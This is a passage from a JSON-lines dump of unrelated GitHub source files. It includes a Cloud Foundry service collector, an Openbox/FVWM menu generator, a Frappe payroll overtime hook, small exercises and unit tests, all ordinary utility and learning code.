fetch(url):\r\n http_headers = {\r\n 'accept': 'application/json',\r\n 'content-type': 'application/json',\r\n 'authorization': self.token\r\n }\r\n response = requests.get(self.base_URL.format(url), headers=http_headers)\r\n if response.status_code == 200: \r\n for resource in response.json().get('resources', []):\r\n service = {'service_instance_name':resource['entity']['name'],\r\n 'service_instance_guid':resource['metadata']['guid'],\r\n 'service_guid':resource['entity']['service_guid'],\r\n 'created_at':resource['metadata']['created_at'],\r\n 'service_plan_guid': resource['entity'].get('service_plan_guid', None),\r\n 'space_guid': resource['entity'].get('space_guid', None)}\r\n \r\n if self.cfdata['spaces'] is not None and self.cfdata['spaces'].get(service['space_guid'], None) is not None:\r\n service['space_name'] = self.cfdata['spaces'][service['space_guid']]['space_name']\r\n service['org_name'] = self.cfdata['spaces'][service['space_guid']]['org_name']\r\n service['org_guid'] = self.cfdata['spaces'][service['space_guid']]['org_guid']\r\n \r\n if self.cfdata['services'] is not None and self.cfdata['services'].get(service['service_guid'], None) is not None:\r\n service['service_name'] = self.cfdata['services'][service['service_guid']]\r\n else:\r\n service['service_name'] = None\r\n print(' Warning. 
Found no service name for service \"{}\" guid \"{}\" in org \"{}\" space \"{}\"'.format(service['service_instance_name'],\r\n service['service_guid'],\r\n service['org_name'],\r\n service['space_name'])) \r\n \r\n if self.cfdata['service_plans'] is not None and self.cfdata['service_plans'].get(service['service_plan_guid'], None) is not None:\r\n service['service_plan_name'] = self.cfdata['service_plans'][service['service_plan_guid']]\r\n else:\r\n service['service_plan_name'] = None\r\n print(' Warning. Found no service plan name for service \"{}\" plan guid \"{}\" in org \"{}\" space \"{}\"'.format(service['service_instance_name'],\r\n service['service_plan_guid'],\r\n service['org_name'],\r\n service['space_name']))\r\n self.cfdata['service_instances'].append(service)\r\n return response.json()['next_url'] \r\n else:\r\n raise Exception('Fatal error retrieving service instance information (GET {}): {}'.format(url, response)) \r\n\r\n # https://apidocs.cloudfoundry.org/280/service_instances/list_all_service_instances.html\r\n url = '/v2/service_instances?results-per-page=100'\r\n\r\n while url is not None:\r\n if self.verbose: \r\n print('Searching for service instances...')\r\n url = fetch(url)\r\n\r\n print('Data collection completed.') \r\n\r\n # generate Pandas DataFrame and return it\r\n return pd.DataFrame(self.cfdata['service_instances'])\r\n\r\n","repo_name":"ibm-watson-data-lab/cf-service-credential-browser","sub_path":"cfservices/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":12141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11078811213","text":"import json\nfrom os.path import dirname, abspath\nfrom helpers.print import debug_print\n\ndef get_absolute_rolling_songs_dir():\n return dirname(dirname(abspath(__file__))) + \"/\"\n\ndef read_config():\n # IMPORTANT: config.json is the only thing that's .gitignore'd\n # don't put your details in example.json, or a file with any other name\n with open(get_absolute_rolling_songs_dir() + \"config/config.json\", \"r\") as cfile:\n config = json.load(cfile)\n\n # get required fields from the example file\n with open(get_absolute_rolling_songs_dir() + \"config/example.json\", \"r\") as example_conf:\n required_fields = json.load(example_conf).keys()\n\n error = False\n error_msg = ''\n for field in required_fields:\n if field not in config.keys():\n error = True\n error_msg += f'\\\"{field}\\\", '\n \n if error:\n debug_print('ERROR: your config.json is missing the following required fields:')\n debug_print('\\t[ ', end='')\n error_msg = error_msg[:-2] # pop trailing comma and space\n debug_print(error_msg, end='')\n debug_print(' ]')\n exit(1)\n\n return config\n\ndef write_config(config):\n with open(get_absolute_rolling_songs_dir() + \"config/config.json\", \"w\") as cfile:\n json.dump(config, cfile, indent=4)\n \n# return none if wrong mode\ndef get_liked_song_max(config):\n if \"MAINTAIN_NUM_SONGS\" in config[\"UPDATE_RULE\"]:\n return config[\"UPDATE_RULE\"][\"MAINTAIN_NUM_SONGS\"]\n\n return None\n\ndef get_liked_days_max(config):\n if \"MAINTAIN_NUM_DAYS\" in config[\"UPDATE_RULE\"]:\n return config[\"UPDATE_RULE\"][\"MAINTAIN_NUM_DAYS\"]\n\n return None","repo_name":"michaeljecmen/liked-songs-sliding-window","sub_path":"helpers/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"339112559","text":"#!/usr/bin/python3\n# menudesktop: Genera un menú a partir de archivos desktop entry.\n# GPL v3+\n\nimport os\nimport unidecode\nimport glob\nfrom collections import OrderedDict\nimport argparse\n\ndefwm = 'openbox'\neditor = 'gvim'\nexecutor = 'exo-open'\nfileman = 'exo-open --launch FileManager'\nwmexec = 'xfce4-appfinder --collapsed'\nsupported_wms = ('openbox', 'fvwm')\n#default_dir = os.environ['HOME'] + '/.local/share/applications'\ndefault_dir = os.environ['HOME'] + '/bin/apps'\ndirs = (default_dir,)\n#dirs = (default_dir, '/usr/share/applications')\nfromcache = False\ncachepath = os.path.expandvars('$HOME') + '/.cache'\nallapps = False\ndeadicon = False\n\nlang = os.environ['LANG']\nlong_lang = lang.split('.')[0] # es_ES\nshort_lang = long_lang.split('_')[0] # en\n\nfull_lang = lang.replace('UTF-8', 'utf8') # Renaming in Thunar.\nfmt_full_lang = '[' + full_lang + ']' # Renaming in Thunar.\nfmt_long_lang = '[' + long_lang + ']' # [es_ES]...\nfmt_short_lang = '[' + short_lang + ']' # [en]...\nlocale = {\n 'en': {\n 'AudioVideo': 'Multimedia',\n 'Audio': 'Audio',\n 'Video': 'Video',\n 'Development': 'Development',\n 'Education': 'Education',\n 'Game': 'Games',\n 'Graphics': 'Graphics',\n 'Network': 'Networks',\n 'Office': 'Office',\n 'Settings': 'Settings',\n 'System': 'System',\n 'Utility': 'Utilities',\n },\n 'es': {\n 'AudioVideo': 'Multimedia',\n 'Audio': 'Audio',\n 'Video': 'Vídeo',\n 'Development': 'Programación',\n 'Education': 'Educación',\n 'Game': 'Juegos',\n 'Graphics': 'Gráficos',\n 'Network': 'Redes',\n 'Office': 'Oficina',\n 'Settings': 'Ajustes',\n 'System': 'Sistema',\n 'Utility': 'Accesorios',\n },\n }\n\nclass Item:\n fsep = '=' # Separador de campos\n esep = ';' # Separador de elementos\n\n\n def __init__(self, dfile):\n self.fdict = {} # Diccionario del archivo\n try:\n self.myfile = open(dfile, 'r')\n except IOError:\n print('No puedo abrir el archivo', dfile)\n exit(1)\n\n for line in self.myfile:\n if line.startswith('#') or line.isspace() or line.startswith('['):\n continue\n f = line.split(self.fsep) # Separamos las líneas en campos\n self.fdict[f[0].strip()] = f[1].strip()\n self.myfile.close()\n\n self.execute = executor + ' ' + dfile\n self.label = getlang('Name', self.fdict, os.path.basename(dfile))\n self.icon = getlang('Icon', self.fdict, 'image_missing')\n self.menu = getlang('Categories', self.fdict, '0') # 0 para ordenarlo\n\n for i in self.menu.split(';'):\n if i in locale[short_lang]:\n self.menu = self.menu.replace(i, locale[short_lang][i])\n\n executable = self.fdict['Exec'].strip().partition(' ')[0]\n self.avaible = which(executable)\n if not self.avaible:\n self.label = self.label + ' (No instalado)'\n self.execute = install(executable)\n if deadicon:\n self.icon = 'no_installed'\n\n\n def addto(self, d):\n if not allapps and not self.avaible:\n return 0\n for menu in self.menu.split(self.esep):\n menu = menu.strip()\n if menu in d:\n d[menu].append([self.label, self.execute, self.icon])\n else:\n d[menu] = [[self.label, self.execute, self.icon]]\n\n\ndef getlang(tag, dic, fallback):\n candidates = (\n tag + fmt_full_lang,\n tag + fmt_long_lang,\n tag + fmt_short_lang,\n tag\n )\n for candidate in candidates:\n if candidate in dic:\n return(dic[candidate])\n return(fallback)\n\n\ndef which(program):\n fpath, fname = os.path.split(program)\n if fpath:\n # Si se especifica una ruta completa.\n exe = program\n else:\n # Si no, busca el ejecutable en PATH.\n for path in os.environ[\"PATH\"].split(os.pathsep):\n exe = 
os.path.join(path, program)\n if os.path.isfile(exe):\n break\n if os.access(exe, os.X_OK):\n return True\n else:\n return False\n\n\ndef install(app):\n cmdline = 'gksu pacman -Syu ' + app\n return(cmdline)\n\ndef dfind(mydir):\n '''Find destop files in a dir'''\n try:\n os.listdir(mydir)\n dfiles = glob.glob(mydir + \"/*.desktop\")\n except:\n return(mydir, 'no es un directorio')\n # FIXME: Si glob está vacío devuelve []\n return(dfiles)\n\ndef gen_dbase():\n dbase = {}\n for mydir in dirs:\n alldfiles = dfind(mydir)\n for afile in alldfiles:\n app = Item(afile)\n app.addto(dbase)\n dbase = OrderedDict(sorted(dbase.items(), key=lambda t: t[0]))\n return(dbase)\n\n\ndef gen_format(wm):\n dbase = gen_dbase()\n if wm == 'openbox':\n fdbase = gen_openbox(dbase)\n elif wm == 'fvwm':\n fdbase = gen_fvwm(dbase)\n else:\n print('No sé cómo producir un menú para ' + wm + '.'\n + wm + 'no está soportado.')\n exit(1)\n return(fdbase)\n\n\ndef print_format(wm):\n data = gen_format(wm)\n for line in data:\n print(line)\n\n\ndef write_cache(wm):\n cache = cachepath + '/menuapps.' + wm + '.cache'\n data = gen_format(wm)\n\n try:\n cache_w = open(cache, 'w')\n for line in data:\n cache_w.write(line + '\\n')\n except IOError:\n print('No puedo escribir en ' + cache)\n exit(1)\n cache_w.close()\n\n\ndef print_from_cache(wm):\n if wm in supported_wms:\n cache = cachepath + '/menuapps.' + wm + '.cache'\n else:\n print('No sé cómo leer un menú para ' + wm)\n exit(1)\n try:\n cache_r = open(cache, 'r')\n for line in cache_r:\n print(line, end='')\n except IOError:\n print('No puedo leer en ' + cache)\n exit(1)\n\n\ndef gen_openbox(db):\n openbox = []\n #icondir = os.environ['OPENBOX_ICONDIR']\n icondir = '/usr/local/share/icons/retrosmart/scalable'\n ext = '.svg'\n noiconfile = icondir + '/' + 'image-missing' + ext\n separator = True\n\n openbox.append('')\n openbox.append(\n ''\n + '' + fileman + ' ' + default_dir\n + '')\n\n if fromcache:\n openbox.append(\n ''\n + ''\n + 'menuapps -w openbox')\n\n openbox.append('')\n openbox.append(\n '' + wmexec\n + '')\n\n if db:\n openbox.append('')\n for submenu in db.keys():\n if not submenu: # Hay entradas vacías\n continue\n fmtsubmenu = unidecode.unidecode(submenu).lower().replace(' ', '_')\n\n if submenu != '0':\n if separator:\n openbox.append('')\n separator = False\n\n openbox.append(\n '')\n\n for item in sorted(db[submenu]): # Contenido de submenus ordenados\n label = item[0]\n execute = item[1]\n icon = item[2]\n\n if not '/' in icon:\n iconfile = icondir + '/' + icon + ext\n else:\n iconfile = icon\n\n if os.path.isfile(iconfile):\n iconpath = iconfile\n else:\n iconpath = noiconfile\n\n openbox.append(\n '' + execute +\n '')\n if submenu != '0':\n openbox.append('')\n else:\n openbox.append(\n '' + '')\n openbox.append('')\n return(openbox)\n\n\ndef gen_fvwm(db):\n fvwm = []\n icondir = '/usr/local/share/icons/retrosmart/scalable' # Para image-missing\n ext = '.svg'\n\n fvwm.append('+ \"Aplicaciones\" Title')\n fvwm.append(\n '+ \"_Editar este menú%pencil.svg:22x22%\" Exec ' + editor + ' ' + conf)\n fvwm.append('+ \"Recargar caché%reload.svg:22x22%\" Exec menuapps -w fvwm')\n fvwm.append('+ \"\" Nop')\n fvwm.append('+ \"Ejecutar%system-run.svg:22x22%\" Exec ' + wmexec)\n fvwm.append('+ \"\" Nop')\n\n if db:\n for submenu in db.keys():\n lowersubmenu = submenu.lower()\n unacclowersubmenu = unidecode.unidecode(submenu).lower()\n\n fvwm.append(\n '+ \"' + submenu + '%' + unacclowersubmenu + ext + ':22x22%\"'\n + ' Popup ' + submenu)\n\n for submenu in 
db.keys():\n fvwm.append('DestroyMenu ' + submenu)\n fvwm.append('AddToMenu ' + submenu + ' \"' + submenu + '\" Title')\n\n for item in sorted(db[submenu]):\n label = item[0].strip()\n execute = item[1].strip()\n icon = item[2].strip()\n\n # Podría coger el icono directamente del las opciones de fvwm\n # pero perderíamos la funcionalidad de image-missing.\n iconfile = icondir + '/' + icon + ext\n noiconfile = icondir + '/' + 'image-missing' + ext\n if os.path.isfile(iconfile):\n iconpath = iconfile\n else:\n iconpath = noiconfile\n\n fvwm.append(\n '+ \"' + label + '%' + iconpath + ':22x22%\"'\n + ' Exec ' + execute)\n else:\n fvwm.append(\n '' + '')\n\n return(fvwm)\n\n\ndef gen_blackbox(db):\n blackbox = []\n icondir = os.environ['OPENBOX_ICONDIR']\n ext = '.png'\n\n blackbox.append('')\n blackbox.append(\n ''\n + '' + editor + ' ' + conf\n + '')\n blackbox.append(\n ''\n + ''\n + 'menuapps blackbox')\n blackbox.append('')\n blackbox.append(\n ''\n + wmexec + '')\n blackbox.append('')\n\n if db:\n for submenu in db.keys():\n lowersubmenu = submenu.lower()\n unacclowersubmenu = unidecode.unidecode(submenu).lower()\n\n if submenu != '0':\n blackbox.append(\n '')\n\n for item in sorted(db[submenu]):\n label = item[0].strip()\n execute = item[1].strip()\n icon = item[2].strip()\n\n blackbox.append(\n '' + execute\n + '')\n if submenu != '0':\n blackbox.append('')\n\n else:\n blackbox.append(\n '' + '')\n blackbox.append('')\n return(blackbox)\n\n\ndef gen_fluxbox(db):\n fluxbox = []\n icondir = os.environ['OPENBOX_ICONDIR']\n ext = '.png'\n\n fluxbox.append('')\n fluxbox.append(\n ''\n + '' + editor + ' ' + conf\n + '')\n fluxbox.append(\n ''\n + ''\n + 'menuapps fluxbox')\n fluxbox.append('')\n fluxbox.append(\n ''\n + wmexec + '')\n fluxbox.append('')\n\n if db:\n for submenu in db.keys():\n lowersubmenu = submenu.lower()\n unacclowersubmenu = unidecode.unidecode(submenu).lower()\n\n if submenu != '0':\n fluxbox.append(\n '')\n\n for item in sorted(db[submenu]):\n label = item[0].strip()\n execute = item[1].strip()\n icon = item[2].strip()\n\n fluxbox.append(\n ''\n + execute + '')\n if submenu != '0':\n fluxbox.append('')\n\n else:\n fluxbox.append(\n '' + '')\n fluxbox.append('')\n return(fluxbox)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n 'wm', help='El tipo de WM para el que se producirá el menú.')\nparser.add_argument(\n '-c', '--cache', action='store_true',\n help='Imprime el menú desde la caché.')\nparser.add_argument(\n '-w', '--write', action='store_true',\n help='Escribe la caché.')\nparser.add_argument(\n '-a', '--allapps', action='store_true',\n help='Muestra la aplicación aunque no esté instalada.')\nparser.add_argument(\n '-i', '--icons', action='store_true',\n help='Muestra el icono de la aplicación no instalada. 
No una lápida.')\n\nargs = parser.parse_args()\n\nif args.allapps:\n    # Muestra todas las aplicaciones, aunque no estén instaladas.\n    allapps = args.allapps\n    if args.icons:\n        # Muestra el icono de la aplicación no instalada en lugar de una lápida\n        # No se tiene en cuenta si no se emplea -a\n        deadicon = args.icons\n\nif args.cache:\n    # Imprime desde archivo caché.\n    print_from_cache(args.wm)\nelif args.write:\n    # Escribe archivo caché desde conf.\n    # FIXME: Añadir mensaje de error para wm\n    write_cache(args.wm)\nelse:\n    # Imprime desde archivo conf.\n    # FIXME: Añadir mensaje de error para wm\n    print_format(args.wm)\n","repo_name":"mdomlop/menudesktop","sub_path":"menudesktop.py","file_name":"menudesktop.py","file_ext":"py","file_size_in_byte":15801,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31417416841","text":"# coding=utf-8\nimport os\n\ndef re_README(file):\n    f = open(file, encoding=\"utf-8\")\n    urls = []\n    for i in f.readlines():\n        i = i.strip(\"\\n\").strip(\" \")\n        i = i + \" \" + \"\\n\"\n        urls.append(i)\n    f.close()\n\n    with open(file, \"w+\", encoding=\"utf-8\") as f:\n        for i in urls:\n            f.write(i)\n    f.close()\ndef list_file(dir_name):\n    files=os.listdir(dir_name)\n    new_file=os.path.abspath(dir_name)\n    for file in files:\n        file=new_file+\"\\\\\"+file\n        if os.path.isdir(file):\n            list_file(file)\n            #print(file)\n        elif \"README.md\" in file:\n            print(file)\n            re_README(file)\n\ndir_name=os.path.dirname(__file__)\nprint(dir_name)\nlist_file(dir_name)\n\n\n\n","repo_name":"nihaohello/N-MiddlewareScan","sub_path":"Github_README_deal.py","file_name":"Github_README_deal.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"11617295243","text":"class Solution() :\n    def saving_with_raise(self) :\n        annual_salary = float(input(\"Enter your annual salary: \"))\n        portion_saved = float(input(\"Enter the percent of your salary to save, as a decimal: \"))\n        total_cost = float(input(\"Enter the cost of your dream home: \"))\n        semi_annual_raise = float(input(\"Enter the semi-annual raise, as a decimal: \"))\n        portion_down_payment = 0.25\n        current_savings = 0\n        months = 0\n        while current_savings < (total_cost * portion_down_payment) :\n            monthly_salary = annual_salary / 12\n            months += 1\n            current_savings += current_savings * 0.04 / 12\n            current_savings += monthly_salary * portion_saved\n            if months % 6 == 0 :\n                annual_salary *= (semi_annual_raise + 1)\n        print(f'Number of months: {months}')\n\nmy_sol = Solution()\nmy_sol.saving_with_raise()\n    ","repo_name":"luluowens/AoPS","sub_path":"MIT 6.0001/problem_set_1/saving_with_a_raise.py","file_name":"saving_with_a_raise.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13562921215","text":"import multiprocessing\n\nimport select\nimport time\n\nimport lcm\n\nfrom test_message import test_message\n\n\ndef sender(channel: str):\n    message = test_message()\n    _lcm = lcm.LCM()\n\n    # Sample\n    message.name = \"Mathieu Tuli\"\n    message.value = \"TEST VALUE\"\n    _lcm.publish(channel, message.encode())\n    # End of sample\n\n    # ADD CODE HERE\n    ################\n\n\ndef listener(channel, data):\n    message = test_message.decode(data)\n    print(f\"\\nReceived test_message on {channel}\")\n    print(f\"    {message.name}\")\n    print(f\"    {message.value}\")\n\n\ndef main():\n    channel_name = \"PRACTICE\"\n    sender_process = 
multiprocessing.Process(\n target=sender, args=(channel_name,))\n sender_process.start()\n\n lcm_1 = lcm.LCM()\n lcm_1.subscribe(channel_name, listener)\n\n timeout = 2\n while True:\n try:\n rfds, wfds, efds = select.select([lcm_1.fileno()], [], [],\n timeout)\n if rfds:\n lcm_1.handle()\n else:\n print(\"\\nLCM 1: I think that's all folks\")\n except KeyboardInterrupt:\n break\n\n\nmain()\n","repo_name":"ArnavJain23/pod1-software-core","sub_path":"software/git-practice/send_and_receive.py","file_name":"send_and_receive.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"22673442719","text":"import frappe\nfrom erpnext.hr.doctype.salary_structure.salary_structure import make_salary_slip\n\n\ndef validate(doc, method):\n basic_component = [x for x in doc.earnings if x.abbr == 'B']\n default_basic_amount = 0\n if basic_component:\n basic_component = basic_component[0]\n default_basic_amount = basic_component.default_amount\n else:\n frappe.throw('Basic(B) component not found!')\n\n employee_settings = frappe.db.get_value('Employee', doc.employee, fieldname=[\n 'attendance', 'overtime'], as_dict=True)\n attendance = employee_settings.get('attendance', 0)\n overtime = employee_settings.get('overtime', 0)\n if attendance and overtime:\n overtime_threshold = float(frappe.get_cached_value(\n 'Company', doc.company, 'overtime_threshold'))\n overtime_factor = float(frappe.get_cached_value(\n 'Company', doc.company, 'overtime_factor'))\n lunch_threshold = float(frappe.get_cached_value(\n 'Company', doc.company, 'lunch_threshold'))\n combined_overtime_threshold = overtime_threshold + lunch_threshold\n overtime_hours = frappe.db.sql(\n \"\"\"\n\t\t\tSELECT \n\t\t\t\tSUM(working_hours-%s) \n\t\t\tFROM `tabAttendance` \n\t\t\tWHERE status='Present' \n\t\t\tAND employee=%s \n\t\t\tAND attendance_date>=%s \n\t\t\tAND attendance_date<=%s \n\t\t\tAND working_hours>%s\n\t\t\t\"\"\",\n (combined_overtime_threshold, doc.employee, doc.start_date, doc.end_date, combined_overtime_threshold))\n overtime_hours = overtime_hours[0][0]\n if overtime_hours:\n\n hourly_pay_rate = default_basic_amount / (26 * 8)\n overtime_amount = overtime_hours * overtime_factor * hourly_pay_rate\n if overtime_amount > 0:\n add_earning_for_hourly_wages(\n doc, doc._salary_structure_doc.overtime_component, overtime_amount)\n doc.calculate_net_pay()\n doc.overtime_pay_rate = hourly_pay_rate * overtime_factor\n doc.overtime_hours = overtime_hours\n # update_deductions(doc)\n\n\ndef add_earning_for_hourly_wages(doc, salary_component, amount):\n row_exists = False\n for row in doc.earnings:\n if row.salary_component == salary_component:\n row.amount = amount\n row_exists = True\n break\n\n if not row_exists:\n wages_row = {\n \"salary_component\": salary_component,\n \"abbr\": frappe.db.get_value(\"Salary Component\", salary_component, \"salary_component_abbr\"),\n \"amount\": amount,\n \"default_amount\": 0.0,\n \"additional_amount\": 0.0,\n \"is_tax_applicable\": 1\n }\n doc.append('earnings', wages_row)\n\n# def update_deductions(doc):\n# data = doc.get_data_for_eval()\n# for struct_row in doc._salary_structure_doc.get(\"deductions\"):\n# amount = doc.eval_condition_and_formula(struct_row, data)\n# if (amount == 0 and struct_row in doc._salary_structure_doc.get(\"deductions\")):\n# doc.update_component_row(struct_row, amount, \"deductions\")\n 
","repo_name":"SunilBGovind/mf_test_env","sub_path":"negentropy_hr/validations/salary_slip.py","file_name":"salary_slip.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11412274288","text":"#!/usr/bin/env python3\n\"\"\"\nTest the pipeline results:\n * does hiding inputs and outputs work as expected?\n\"\"\"\n\nfrom reportsrender.papermill import render_papermill, _remove_cells\nimport nbformat\nfrom pprint import pprint\n\n\ndef test_remove_cells():\n \"\"\"Test that removing and keeping outputs works properly. \"\"\"\n nb = nbformat.from_dict(\n {\n \"cells\": [\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {\"tags\": [\"hide_input\"]},\n \"source\": \"# REMOVE_CELL\",\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {\"tags\": [\"remove_input\"]},\n \"source\": \"# REMOVE_CELL\",\n },\n {\n \"cell_type\": \"code\",\n \"metadata\": {},\n \"outputs\": [\n {\n \"data\": {\n \"image/png\": \"base64\",\n \"text/plain\": \"INCLUDE_OUTPUT_01\",\n }\n }\n ],\n \"source\": \"# INCLUDE_INPUT_01\",\n },\n {\n \"cell_type\": \"code\",\n \"metadata\": {\"tags\": [\"remove_cell\"]},\n \"outputs\": [\n {\"data\": {\"image/png\": \"base64\", \"text/plain\": \"REMOVE_CELL\"}}\n ],\n \"source\": \"# REMOVE_CELL\",\n },\n {\n \"cell_type\": \"code\",\n \"metadata\": {\"tags\": [\"hide_output\"]},\n \"outputs\": [\n {\"data\": {\"image/png\": \"base64\", \"text/plain\": \"REMOVE_CELL\"}}\n ],\n \"source\": \"# INCLUDE_INPUT_02\",\n },\n ],\n \"metadata\": {},\n \"nbformat\": 4,\n \"nbformat_minor\": 0,\n }\n )\n\n nb2 = _remove_cells(nb)\n\n assert nb2 == nb\n\n str_repr = str(nb)\n\n pprint(nb)\n\n assert \"INCLUDE_OUTPUT_01\" in str_repr\n assert \"INCLUDE_INPUT_01\" in str_repr\n assert \"INCLUDE_INPUT_02\" in str_repr\n assert \"REMOVE_CELL\" not in str_repr\n\n\ndef test_render_papermill(tmp_path):\n in_file = \"notebooks/02_analyze_data.Rmd\"\n out_file = tmp_path / \"report.html\"\n params = {\"input_file\": \"notebooks/iris.tsv\"}\n render_papermill(in_file, out_file, params)\n\n result = out_file.read_text()\n\n assert \"ECHO_FALSE\" not in result\n assert \"RESULTS_HIDE\" not in result\n assert \"ECHO_TRUE_01\" in result\n assert \"ECHO_TRUE_02\" in result\n assert \"RESULTS_SHOW_01\" in result\n assert \"RESULTS_SHOW_02\" in result\n\n\ndef test_render_papermill_ipynb(tmp_path):\n \"\"\"The same should work for a ipynb input file\"\"\"\n in_file = \"notebooks/02_analyze_data.ipynb\"\n out_file = tmp_path / \"report.html\"\n params = {\"input_file\": \"notebooks/iris.tsv\"}\n render_papermill(in_file, out_file, params)\n\n result = out_file.read_text()\n\n assert \"ECHO_FALSE\" not in result\n assert \"RESULTS_HIDE\" not in result\n assert \"ECHO_TRUE_01\" in result\n assert \"ECHO_TRUE_02\" in result\n assert \"RESULTS_SHOW_01\" in result\n assert \"RESULTS_SHOW_02\" in result\n\n\ndef test_render_papermill_md(tmp_path):\n \"\"\"... 
and a markdown input file (jupytext format) \"\"\"\n in_file = \"notebooks/02_analyze_data.md\"\n out_file = tmp_path / \"report.html\"\n params = {\"input_file\": \"notebooks/iris.tsv\"}\n render_papermill(in_file, out_file, params)\n\n result = out_file.read_text()\n\n assert \"ECHO_FALSE\" not in result\n assert \"RESULTS_HIDE\" not in result\n assert \"ECHO_TRUE_01\" in result\n assert \"ECHO_TRUE_02\" in result\n assert \"RESULTS_SHOW_01\" in result\n assert \"RESULTS_SHOW_02\" in result\n","repo_name":"grst/reportsrender","sub_path":"tests/test_papermill.py","file_name":"test_papermill.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"11910430093","text":"names = ['Jerry', 'Kramer', 'Elaine', 'George', 'Newman']\n\n# Pythonic way of looping over list uses list comprehension. Note that lists are ordered collections of items or objects. This makes lists in Python \n# \"sequence types\", as they behave like a sequence. This means that they can be iterated using for loops. Other examples of sequences are Strings, \n# tuples, or sets. Lists are similar in spirit to strings you can use the len() function and square brackets [ ] to access the data, with the first\n# element indexed at 0.\n\n# loop over the contents of names \nbetter_list = []\nfor name in names:\n if len(name) >= 6:\n better_list.append(name)\nprint(better_list)\n\n# Print the list created by using list comprehension\nbest_list = [name.upper() for name in names if len(name) >= 6]\nprint(best_list)\n\nMyNumbers = [1, 2]\nS = [x**2 for x in MyNumbers]\nprint(S)","repo_name":"DataElevated/python","sub_path":"Lists/ListComprehension.py","file_name":"ListComprehension.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17688423571","text":"#coding:utf8\nimport os\nimport zipfile\nfrom django_project.settings import BASE_DIR\nimport codecs\n\n\ndef zip_compress(dir_name, zip_file_target, path, exclude_files, target_path):\n if dir_name in exclude_files:\n return\n currentPath = \"%s/%s\" % (path, dir_name)\n if os.path.isdir(currentPath) == True:\n files = os.listdir(currentPath)\n for file in files:\n zip_compress(file, zip_file_target, currentPath, exclude_files, target_path +\"/\" + dir_name)\n else:\n zip_file_target.write(currentPath, target_path + \"/\" +dir_name)\n\n\ndef compress_in_folder():\n root_folder = BASE_DIR\n zipf = zipfile.ZipFile('%s/result.zip' % root_folder, 'w')\n # zip the path\n dir_path = '%s/db_reverse/temp' % root_folder\n files = os.listdir(dir_path)\n exclude_file = [\".gitignore\", \".git\"]\n for file in files:\n if file not in exclude_file:\n zip_compress(file, zipf, dir_path, exclude_file, \"\")\n zipf.close()\n\n\ndef save_string_to_file(file_name, content):\n root_folder = BASE_DIR\n temp_file = '%s/db_reverse/temp/%s' % (root_folder, file_name)\n file = codecs.open(temp_file, \"w+\", \"utf-8\")\n file.write(content)\n file.close()","repo_name":"t3573393/django_admin_db_reverse","sub_path":"django_project/db_reverse/codegen/filecompress.py","file_name":"filecompress.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31948385178","text":"\"\"\"\nWrite two functions to find the minimum number in a list.\nFirst function: O(n)\nSecond function: O(n**2)\n\"\"\"\n\n\ndef 
search_minimum1(list1):\n \"\"\"\n Complexity O(n)\n \"\"\"\n temp = list1[0]\n for i in range(1, len(list1)):\n if list1[i] < temp:\n temp = list1[i]\n return temp\n\n\ndef search_minimum2(list2: list):\n \"\"\"\n Complexity O(n**2)\n \"\"\"\n for i in range(len(list2)):\n temp = list2[i]\n for j in range(1, len(list2)):\n if temp > list2[j]:\n temp = list2[j]\n return temp\n\n\nlista = [10, 30, 20, 5, 15, 3, 1, 0.2, 0.05]\nprint(search_minimum2(lista))\nprint(search_minimum1(lista))","repo_name":"oliveiraiago/estruturaDeDados","sub_path":"bigO.py","file_name":"bigO.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13515700952","text":"import unittest\n\nfrom robot.reporting.logreportwriters import LogWriter\nfrom robot.utils.asserts import assert_true, assert_equal\n\n\nclass LogWriterWithMockedWriting(LogWriter):\n\n def __init__(self, model):\n LogWriter.__init__(self, model)\n self.split_write_calls = []\n self.write_called = False\n\n def _write_split_log(self, index, keywords, strings, path):\n self.split_write_calls.append((index, keywords, strings, path))\n\n def _write_file(self, output, config, template):\n self.write_called = True\n\n\n\nclass TestLogWriter(unittest.TestCase):\n\n def test_splitting_log(self):\n class model:\n split_results = [((0, 1, 2, -1), ('*', '*1', '*2')),\n ((0, 1, 0, 42), ('*','*x')),\n (((1, 2), (3, 4, ())), ('*',))]\n writer = LogWriterWithMockedWriting(model)\n writer.write('mylog.html', None)\n assert_true(writer.write_called)\n assert_equal([(1, (0, 1, 2, -1), ('*', '*1', '*2'), 'mylog-1.js'),\n (2, (0, 1, 0, 42), ('*', '*x'), 'mylog-2.js'),\n (3, ((1, 2), (3, 4, ())), ('*',), 'mylog-3.js')],\n writer.split_write_calls)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"robotframework/robotframework","sub_path":"utest/reporting/test_logreportwriters.py","file_name":"test_logreportwriters.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":8521,"dataset":"github-code","pt":"21"} +{"seq_id":"43706891659","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# (c) 2018-2019 